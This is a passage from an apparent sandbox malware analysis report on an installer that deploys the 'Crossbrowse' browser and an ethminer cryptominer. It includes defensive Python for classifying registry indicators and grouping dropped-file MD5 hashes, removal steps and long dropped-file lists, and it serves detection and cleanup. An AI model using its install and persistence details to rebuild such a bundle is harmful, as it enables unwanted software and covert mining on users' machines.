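    ("ie_zonemap_change", re.compile(r'\\Internet Settings\\ZoneMap$', re.I)),
]
# Keys the OS writes as a side effect of running any program: not indicators.
NOISE = re.compile(r'(\\Explorer\\Shell Folders$|\\Cryptography\\RNG$|\\MountPoints2\\)', re.I)


def classify(entries):
    """Drop OS noise, bucket the rest by rule; anything unmatched lands in 'other'."""
    buckets = defaultdict(list)
    for key, name, value in entries:
        if NOISE.search(key):
            continue
        for cat, rx in RULES:
            if rx.search(key):
                buckets[cat].append((key, name, value))
                break
        else:
            buckets["other"].append((key, name, value))
    return dict(buckets)


# XP firewall AuthorizedApplications value format: <path>:<scope>:<Enabled|Disabled>:<name>
FW_RE = re.compile(r'^(.*?):(\*|[^:]*):(Enabled|Disabled):(.*)$')


def parse_firewall_entry(value):
    """Split an AuthorizedApplications value; scope '*' means any remote address."""
    m = FW_RE.match(value)
    if not m:
        raise ValueError("not an AuthorizedApplications value: %r" % value)
    path, scope, state, friendly = m.groups()
    return {"path": path, "any_remote": scope == "*", "enabled": state == "Enabled", "name": friendly}


if __name__ == "__main__":
    for cat, items in classify(parse_entries(SAMPLE)).items():
        print(cat)
        for key, name, value in items:
            print("   ", key, "->", name, "=", value)
```

On the firewall entry: the listing shows the value name as `crossbrowse.exe` under a key ending in `...\List\%Program Files%\Crossbrowse\Crossbrowse\Application`; in the real XP policy store the value name is the full executable path, and the report's renderer has most likely split it at the last backslash (an inference from the key format, not something the report states).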
Dropped PE files
MD5 | File path |
---|---|
de36bf8875ae7354dee15db775eb671d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5185\setup.exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9035.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh22.tmp\registry.dll |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq1C.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1F.tmp\registry.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll |
7b95322ce4962d0df08819c8ce04f5f4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxE.tmp |
c8fa1fa3b18a3433cc051fc1dc8e4382 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz27.tmp\nsProcess.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz27.tmp\registry.dll |
63cf70a88c53c93d23d322ae60e5ba51 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz2A.tmp |
798e76757d49d72f41b8eebe1e77a852 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
63cf70a88c53c93d23d322ae60e5ba51 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] |
5940a60b403721e5a8739be2e44d3c4b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe |
7c80d3e37e8cf5974ca149fde9f1ec6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe |
d827c232ea17f09532bc7d73cc6cf44e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe |
00ccf557175b834662b75c2fe6d8c7fa | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\PepperFlash\pepflashplayer.dll |
cc24001b457f3cfb86ab174d68ffe02b | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome.dll |
8c51d8ebd090ff4d510ca25d01f04196 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_child.dll |
b799e609a738b42a993ec13fbaedff8e | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\d3dcompiler_46.dll |
670da7998dfbf06dae646c8d8f6e06c4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe |
c032d88eb99f7562bb58e00f41b9d6a4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\ffmpegsumo.dll |
0e2e43dc527bb894b4eaa0723b7d8450 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libegl.dll |
8ff5fccdae68c1f04e29211b8ab2413a | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libexif.dll |
d081a7e3dd9a488c32621440efefd8a2 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libglesv2.dll |
015b0ed92a5cc7ef3f727eafa50f34c3 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\metro_driver.dll |
c466ce7d02c7b0ee5160c1d40e10fdbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\nacl64.exe |
e5aed26e81a2567fe8f71e51feed2ed7 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\pdf.dll |
14b1d2a3a4b5f74541292de251244f66 | c:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe |
ea76c784fe08389a29306940372ac66a | c:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe |
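Several MD5 values recur in the table above under different names: the bytes fetched into the WinINet cache as `installer[1].exe` are the same bytes later written as `9035.exe` and as `utility.exe`, `Bundle_OperaRUnew[1].exe` reappears as `nsq1C.tmp`, and the temp `setup.exe` is installed twice as `setup.exe` and `chrmstp.exe`. Grouping the table by hash therefore recovers which downloaded file each installed binary came from. The following is an added example, not code from the report: it parses the table format used above (a subset of rows copied from it, labelled as constructed) and treats any path under `Temporary Internet Files` as a download, which is an assumption about the sandbox's layout.

```python
"""Group a MAS 'Dropped PE files' table by MD5 to map installed copies back to
the cached download with identical bytes. Added example; the rows below are a
constructed subset of the report's table, and the cache-path heuristic is an
assumption."""
from collections import defaultdict

TABLE = r"""
de36bf8875ae7354dee15db775eb671d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5185\setup.exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9035.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh22.tmp\registry.dll |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq1C.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1F.tmp\registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz27.tmp\registry.dll |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe |
7c80d3e37e8cf5974ca149fde9f1ec6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe |
14b1d2a3a4b5f74541292de251244f66 | c:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe |
ea76c784fe08389a29306940372ac66a | c:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe |
"""


def parse_table(text):
    """Return (md5, path) pairs from 'md5 | path |' rows; header/separator rows are skipped."""
    rows = []
    for line in text.strip().splitlines():
        parts = [p.strip() for p in line.strip().strip("|").split("|")]
        if len(parts) >= 2 and len(parts[0]) == 32:
            rows.append((parts[0].lower(), parts[1]))
    return rows


def is_download(path):
    """Assumption: anything in the WinINet cache was fetched over HTTP by the installer."""
    return "\\Temporary Internet Files\\" in path


def group_by_hash(rows):
    """For each MD5, separate cached downloads from copies written elsewhere on disk."""
    groups = defaultdict(lambda: {"downloaded_as": [], "written_as": []})
    for md5, path in rows:
        slot = "downloaded_as" if is_download(path) else "written_as"
        groups[md5][slot].append(path)
    return dict(groups)


def unique_hashes(rows):
    """De-duplicated hash list, the part of the table worth feeding to a blocklist."""
    return sorted({md5 for md5, _ in rows})


def reused_binaries(groups):
    """Hashes that occur under more than one path: one binary, several names."""
    return {h: g for h, g in groups.items()
            if len(g["downloaded_as"]) + len(g["written_as"]) > 1}


def download_origins(groups):
    """Map each installed/temp copy to the cache file with identical bytes, if one exists."""
    origin = {}
    for g in groups.values():
        for cache in g["downloaded_as"]:
            for written in g["written_as"]:
                origin[written] = cache
    return origin


if __name__ == "__main__":
    groups = group_by_hash(parse_table(TABLE))
    for written, cache in sorted(download_origins(groups).items()):
        print(written, "<-", cache)
    print(len(unique_hashes(parse_table(TABLE))), "distinct hashes")
```

Hashes that appear only as a download (here `Cdn[1].exe`) mean the bytes were fetched but no on-disk copy under that hash was recorded, so either they were consumed in memory or renamed after modification; hashes that appear only under an installed path (here `crossbrowse.exe`) were unpacked from an archive rather than downloaded as-is.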
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsy19.tmp:1136
9035.exe:796
nsq1C.tmp:976
nsq1C.tmp:1312
nsz2A.tmp:784
nss23.tmp:516
nsf7.tmp:644
nst13.tmp:444
setup.exe:700
%original file name%.exe:468
nsmB.tmp:640
amisid.exe:444
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_finance.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\setup.exe (37305 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (1464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_news.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\skype.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nfl.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\groupom.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\espn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\msn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\weather_channel.ico (5593 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].002 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].005 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (24 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\chrome.packed.7z (1266739 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\theguardian.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].003 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\search.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj26.tmp (28995 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9035.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
